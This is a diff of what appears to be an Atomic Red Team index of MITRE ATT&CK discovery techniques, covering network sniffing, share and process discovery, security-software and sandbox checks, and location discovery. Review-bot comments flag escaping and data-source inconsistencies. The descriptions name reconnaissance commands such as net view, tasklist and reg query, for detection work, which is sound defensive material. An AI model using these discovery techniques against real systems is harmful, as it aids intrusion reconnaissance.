@@ -47393,12 +50126,10 @@ discovery: Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans. x_mitre_data_sources: - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - Process command-line parameters - - Process use of network - x_mitre_version: '2.1' + - 'Command: Command Execution' + - 'Cloud Service: Cloud Service Enumeration' + - 'Network Traffic: Network Traffic Flow' + x_mitre_version: '2.2' x_mitre_contributors: - Praetorian x_mitre_is_subtechnique: false @@ -47533,8 +50264,8 @@ discovery: over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the - net view \\\\remotesystem command. It can also be used to query - shared drives on the local system using net share." + net view \\\\\\\\remotesystem command. It can also be used to + query shared drives on the local system using net share." external_references: - source_name: mitre-attack external_id: T1135 @@ -47556,7 +50287,7 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-10-07T18:10:06.463Z' + modified: '2020-12-29T19:07:11.154Z' created: '2017-12-14T16:46:06.044Z' x_mitre_is_subtechnique: false x_mitre_contributors: 
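Review bot: In the @@ -47533 hunk the escape count in the T1135 description doubles, from `net view \\\\remotesystem` to `net view \\\\\\\\remotesystem`; inside a YAML double-quoted scalar the old form decodes to `\\remotesystem`, which is the real UNC syntax, and the new one to `\\\\remotesystem`. Confirm this matches the upstream STIX description and is not the generator escaping an already-escaped string a second time, and check the rendered T1135 page: unless the markdown renderer is expected to collapse the pairs, the command should show two backslashes, not four.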
@@ -47572,10 +50303,9 @@ discovery: Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Network protocol analysis - - Process use of network + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_version: '3.0' identifier: T1135 atomic_tests: @@ -47686,14 +50416,6 @@ discovery: name: powershell T1040: technique: - created: '2017-05-31T21:30:41.399Z' - modified: '2020-03-25T21:03:49.610Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: 
@@ -47712,21 +50434,27 @@ discovery: name: Network Sniffing created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529 - x_mitre_version: '1.1' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-02T17:51:59.236Z' + created: '2017-05-31T21:30:41.399Z' + x_mitre_version: '1.2' x_mitre_data_sources: - - Network device logs - - Host network interface - - Netflow/Enclave netflow - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would - likely need to perform a man-in-the-middle attack against other devices on - a wired network in order to capture traffic that was not to or from the current - compromised system. This change in the flow of information is detectable at - the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. - Detecting compromised network devices is a bit more challenging. Auditing - administrator logins, configuration changes, and device images is required - to detect malicious changes. + likely need to perform a [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) + attack against other devices on a wired network in order to capture traffic + that was not to or from the current compromised system. This change in the + flow of information is detectable at the enclave network level. Monitor for + ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network + devices is a bit more challenging. Auditing administrator logins, configuration + changes, and device images is required to detect malicious changes. x_mitre_permissions_required: - Administrator - SYSTEM 
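Review bot: In the @@ -47712 hunk the T1040 data sources are reduced to `Process: Process Creation` and `Command: Command Execution`, while the x_mitre_detection text in the same hunk still says the change in traffic flow is detectable at the enclave network level and asks for monitoring of ARP spoofing, gratuitous ARP broadcasts, and administrator logins, configuration changes and device images on network devices; none of that maps to the two remaining sources, and the removed `Network device logs`, `Host network interface` and `Netflow/Enclave netflow` are exactly the ones the prose relies on. Either the detection text or the data source list is stale upstream; raise it there rather than regenerate over it, and note the next hunk adds `Network` to x_mitre_platforms, which makes the missing network-level sources more conspicuous.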
@@ -47734,6 +50462,7 @@ discovery: - Linux - macOS - Windows + - Network x_mitre_system_requirements: - Network interface access and packet capture driver x_mitre_is_subtechnique: false @@ -47914,8 +50643,8 @@ discovery: will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_contributors: - Sudhanshu Chauhan, @Sudhanshu_C x_mitre_version: '1.2' @@ -48066,10 +50795,9 @@ discovery: - Windows - macOS x_mitre_data_sources: - - PowerShell logs - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_is_subtechnique: false identifier: T1120 atomic_tests: @@ -48107,21 +50835,20 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-10-08T17:36:01.675Z' + modified: '2021-03-30T12:29:56.512Z' created: '2017-05-31T21:30:55.471Z' x_mitre_is_subtechnique: false x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - Office 365 - - Azure AD - - AWS - - GCP - - Azure - - SaaS + - Google Workspace x_mitre_permissions_required: - User x_mitre_detection: |- 
@@ -48129,26 +50856,22 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - AWS CloudTrail logs - - Azure activity logs - - Office 365 account logs - - API monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '2.2' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Group: Group Enumeration' + - 'Group: Group Metadata' + - 'Application Log: Application Log Content' + x_mitre_version: '2.3' atomic_tests: [] T1057: technique: - created: '2017-05-31T21:30:48.728Z' - modified: '2020-03-26T18:05:53.130Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Process Discovery + description: |- + Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 
+ + In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1057 
@@ -48156,33 +50879,34 @@ discovery: - external_id: CAPEC-573 source_name: capec url: https://capec.mitre.org/data/definitions/573.html - description: |- - Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - - In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. - name: Process Discovery - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580 - x_mitre_version: '1.2' - x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. - - Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. 
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_platforms: - - Linux - - macOS - - Windows + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2020-03-26T18:05:53.130Z' + created: '2017-05-31T21:30:48.728Z' + x_mitre_is_subtechnique: false + x_mitre_system_requirements: + - Administrator, SYSTEM may provide better process ownership details x_mitre_permissions_required: - User - Administrator - SYSTEM - x_mitre_system_requirements: - - Administrator, SYSTEM may provide better process ownership details - x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. + + Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. 
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + x_mitre_version: '1.2' identifier: T1057 atomic_tests: - name: Process Discovery - ps @@ -48254,9 +50978,10 @@ discovery: - Administrator - SYSTEM x_mitre_data_sources: - - Windows Registry - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Access' + - 'Process: OS API Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. @@ -48301,12 +51026,6 @@ discovery: elevation_required: true T1018: technique: - created: '2017-05-31T21:30:28.187Z' - modified: '2020-09-17T12:26:53.669Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: 
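Review bot: The @@ -48156 hunk for T1057 is 33 lines removed and 34 added with no semantic change: `modified` stays `2020-03-26T18:05:53.130Z`, x_mitre_version stays `1.2`, and the description, detection text, platforms and permissions are re-emitted verbatim in a different key order; the same pattern (created, modified, kill_chain_phases and type removed from the top of the entry and re-added after object_marking_refs) appears for T1046, T1040 and T1018 in this patch. Serialise technique keys in a fixed order in the generator so a regeneration diff contains only real data changes; as it stands a 49,645-line index.yaml diff cannot be reviewed for correctness.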
@@ -48316,6 +51035,10 @@ discovery: - external_id: CAPEC-292 source_name: capec url: https://capec.mitre.org/data/definitions/292.html + - source_name: Elastic - Koadiac Detection with EQL + url: https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql + description: 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: + Building detections against Koadic using EQL. Retrieved November 30, 2020.' description: "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within 
@@ -48330,16 +51053,24 @@ discovery: name: Remote System Discovery created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735 - x_mitre_version: '3.0' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-13T21:40:23.368Z' + created: '2017-05-31T21:30:28.187Z' + x_mitre_version: '3.1' x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'File: File Access' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + + Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) x_mitre_platforms: - Linux - macOS 
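Review bot: In the @@ -48330 hunk T1018 gains the data source `File: File Access`, but nothing in the x_mitre_detection text, old or new, says which files remote system discovery reads; the detection paragraph added in the same hunk covers only ping.exe and tracert.exe. If the data source is meant to cover reading a local hosts or configuration file, the detection text should say so, otherwise the entry tells a detection engineer to watch file access with no file to watch. The same unexplained `File: File Access` is added to T1087.001 earlier in this patch.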
@@ -48349,6 +51080,7 @@ discovery: - Administrator - SYSTEM x_mitre_contributors: + - Daniel Stepanic, Elastic - RedHuntLabs, @redhuntlabs x_mitre_is_subtechnique: false identifier: T1018 @@ -48605,6 +51337,17 @@ discovery: name: command_prompt T1518.001: technique: + id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384 + description: |- + Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. + + Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. + + Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) + name: Security Software Discovery + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1518.001 
@@ -48616,50 +51359,37 @@ discovery: url: https://expel.io/blog/finding-evil-in-aws/ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Security Software Discovery - description: |- - Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - - Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. 
- - Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) - id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-09-16T19:36:16.978Z' + modified: '2021-03-29T16:05:00.198Z' created: '2020-02-21T21:16:18.066Z' - x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_permissions_required: - - User + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment. 
- x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Firewall: Firewall Metadata' + - 'Firewall: Firewall Enumeration' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' identifier: T1518.001 atomic_tests: - name: Security Software Discovery @@ -48768,10 +51498,10 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-09-16T19:36:17.133Z' + modified: '2021-03-29T16:05:00.456Z' created: '2019-09-16T17:52:44.147Z' x_mitre_is_subtechnique: false - x_mitre_version: '1.2' + x_mitre_version: '1.3' x_mitre_permissions_required: - User - Administrator @@ -48780,22 +51510,20 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Firewall: Firewall Metadata' + - 'Firewall: Firewall Enumeration' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace identifier: T1518 atomic_tests: - name: Find and Display Internet Explorer Browser Version 
@@ -48850,7 +51578,7 @@ discovery: before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nSpecific checks - may will vary based on the target and/or adversary, but may involve behaviors + will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) @@ -48859,8 +51587,8 @@ discovery: the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties - such as uptime and samples of network traffic. Adversaries may also check - the network adapters addresses, CPU core count, and available memory/drive + such as host/domain name and samples of network traffic. Adversaries may also + check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific @@ -48893,7 +51621,7 @@ discovery: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-07-01T16:32:02.514Z' + modified: '2021-04-21T15:16:10.604Z' created: '2020-03-06T20:57:37.959Z' x_mitre_platforms: - Linux 
@@ -48902,8 +51630,9 @@ discovery: x_mitre_contributors: - Deloitte Threat Library Team x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed @@ -48915,7 +51644,7 @@ discovery: or perform other forms of Discovery, especially in a short period of time, may aid in detection. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_defense_bypassed: - Static File Analysis - Signature-based detection 
@@ -48977,21 +51706,8 @@ discovery: ' T1082: technique: - created: '2017-05-31T21:31:04.307Z' - modified: '2020-03-26T18:17:42.298Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern - id: attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: System Information Discovery - description: |- - An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - - Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges. - - Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1082 
@@ -49011,33 +51727,43 @@ discovery: October 8, 2019. url: https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get source_name: Microsoft Virutal Machine API - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - x_mitre_permissions_required: - - User + description: |- + An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. + + Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges. + + Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. 
Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) + name: System Information Discovery + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-03-08T10:33:01.066Z' + created: '2017-05-31T21:31:04.307Z' + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Praetorian + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'Instance: Instance Metadata' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations. 
- x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs - - Process monitoring - - Process command-line parameters - x_mitre_version: '2.1' - x_mitre_contributors: - - Praetorian - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Windows + - IaaS + - Linux + - macOS identifier: T1082 atomic_tests: - name: System Information Discovery 
@@ -49210,6 +51936,81 @@ discovery: ' name: sh + T1614: + technique: + external_references: + - source_name: mitre-attack + external_id: T1614 + url: https://attack.mitre.org/techniques/T1614 + - source_name: FBI Ragnar Locker 2020 + url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf + description: FBI. (2020, November 19). Indicators of Compromise Associated + with Ragnar Locker Ransomware. Retrieved April 1, 2021. + - source_name: Sophos Geolocation 2016 + url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/ + description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals + target you based on where you live. Retrieved April 1, 2021.' + - source_name: Bleepingcomputer RAT malware 2020 + url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/ + description: Abrams, L. (2020, October 23). New RAT malware gets commands + via Discord, has ransomware feature. Retrieved April 1, 2021. + - source_name: AWS Instance Identity Documents + url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html + description: Amazon. (n.d.). Instance identity documents. Retrieved April + 2, 2021. + - source_name: Microsoft Azure Instance Metadata 2021 + url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows + description: Microsoft. (2021, February 21). Azure Instance Metadata Service + (Windows). Retrieved April 2, 2021. + - source_name: Securelist Trasparent Tribe 2020 + url: https://securelist.com/transparent-tribe-part-1/98127/ + description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, + part 1. Retrieved April 1, 2021.' 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: System Location Discovery + description: |2- + + Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. + + Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021) + + Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016) + id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-20T19:25:49.977Z' + created: '2021-04-01T16:42:08.735Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. + + Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW to gather information.(Citation: FBI Ragnar Locker 2020) + + Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo. + x_mitre_data_sources: + - 'Instance: Instance Metadata' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + x_mitre_contributors: + - Pooja Natarajan, NEC Corporation India + - Hiroki Nagahama, NEC Corporation + - Manikantan Srinivasan, NEC Corporation India + - Wes Hurd + - Katie Nickels, Red Canary + x_mitre_platforms: + - Windows + - Linux + - macOS + - IaaS + atomic_tests: [] T1016: technique: id: attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0 @@ -49232,7 +52033,7 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-15T00:55:33.136Z' + modified: '2021-04-24T13:13:49.594Z' created: '2017-05-31T21:30:27.342Z' x_mitre_is_subtechnique: false 